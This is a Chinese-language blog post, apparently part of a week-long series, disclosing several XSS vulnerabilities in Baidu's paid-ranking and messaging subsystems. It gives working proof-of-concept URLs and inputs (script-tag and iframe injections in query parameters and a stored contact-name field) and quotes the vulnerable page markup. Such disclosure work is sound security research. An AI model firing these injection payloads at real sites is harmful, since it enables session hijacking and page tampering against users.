The Week of Baidu Bugs – Day 06: 百度竞价排名多处XSS漏洞

来源:大风起兮云飞扬

注:版权所有,转载请注明出处。

今天内容比较平淡,都是普通的XSS。

竞价排名是百度的一个子系统,应该是比较赚钱的一个系统。

访问地址是: http://www2.baidu.com

但是这个系统和其他核心模块比起来,安全性要差上很多。

糟糕的验证码设计暂且不说,XSS方面几乎没有防范。

今天讲这个子系统主要是举例下baidu在非核心系统方面对安全考虑和重视程度的欠缺

类似存在缺陷的系统还非常多。就不一个个去挖了,没有挑战性也没什么意思。

XSS 9: 百度竞价排名管理关键字 XSS 漏洞
漏洞链接如下:
http://www2.baidu.com/query/query_mgr.php?gid=A&tp=A&pe=20&ob=status&sb=keyword&uid=1019083&sw=“><script>alert(/Keyword+XSS/)</script><“&cp=1&submit=1

代码如下:
<form name=choice action=”” method=post><td align=center>
<select name=gid ><option value=”0″>我的关键字</option>
<option value=”A” selected>所有关键字组别</option>
</select>

……

<input name=sw size=10 value=”“><script>alert(/Keyword XSS/)</script><““>
<input type=hidden name=cp value=”1”>

XSS 10: 百度竞价排名帮助搜索XSS
登录后,如下链接:
http://sf-help.baidu.com/search?word=“><script>alert(/Search+XSS/);</script><”


代码如下:
<form action=’/search’ method=’GET’ style=”margin:0px;padding:0px;”>
<div class=”tit_2″><strong>帮助搜索</strong></div>
<div class=”box_2″>
<input name=”word” type=”text” size=”19″ id=”s” value=”\”><script>alert(/Search XSS/);</script><\”“>
<input type=”submit” name=”Submit” value=”搜索”>
</div>
</form>

XSS 11: 百度竞价排名联系人Stored XSS
登录竞价排名后,修改个人设定,将联系人姓名改为:
<script>alert();</script>
保存

然后在登录首页,将执行脚本

代码如下:
<table border=0 cellpadding=0 cellspacing=0 width=800>
<tr><td colspan=3><h3 align=center><br>欢迎访问百度竞价排名客户管理系统</h3>
</td></tr></table>
<table align=center width=800 class=h4_center>
<tr><td height=30 align=center>尊敬的用户 <script>alert(/联系人姓名/);</script>XSShere,您好!
<input type=”hidden” name=”servermode” id=”servermode” value=””>

这是一个持久类型的XSS,也就是说,会存储在服务器端。

昨天,在幻影的邮件列表里,有一个叫royalwhy的朋友,在回复我的邮件里,也发了一个他发现的XSS。
经过他的同意后,我将其也贴在这里。

XSS 12:百度发送消息XSS (发现者:royalwhy)
漏洞如下:
http://msg.baidu.com/ms?ct=21&cm=1&tn=bmSendMessage&un=<iframe src=http://groups.google.com/group/ph4nt0m width=500 height=300/>


un参数后可以执行任意脚本,代码如下:
<form name=”f” method=post action=”http://msg.baidu.com/” autocomplete = “off”>
<input type=hidden name=ct value=”22″>
<input type=hidden name=cm value=”MailSend”>
<input type=hidden name=tn value=”bmspsubmit”>
<input type=hidden name=lu value=””>
<input type=hidden name=vcode value=””>
<tr >
<td align=”right”>发送至:</td>
<td><input type=hidden name=sn value=”<iframe src=http://groups.google.com/group/ph4nt0m width=500 height=300/>”><iframe src=http://groups.google.com/group/ph4nt0m width=500 height=300/></td>
</tr>


百度的问题还有很多很多,今天只是举例来讲一个子系统。

这个系列写到这里,也没什么更大的动力再写下去了,我不喜欢做重复的劳动,所以明天将是最后一天,让我们结束这一切。而我也将有精力来阐述一些其他方面的问题和观点。

欲知后事如何,且听下回分解。

PS: 本次活动仅仅是个人行为,与任何组织或集体无关.

相关日志

发表评论